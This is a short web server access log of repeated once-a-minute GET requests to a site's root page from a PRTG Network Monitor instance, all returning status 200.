212.91.246.72 - - [01/Mar/2023:22:44:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:22:45:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:22:46:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:22:47:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:22:48:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:22:49:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:22:50:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:22:51:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:22:52:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:22:53:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:22:54:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:22:55:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:22:56:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
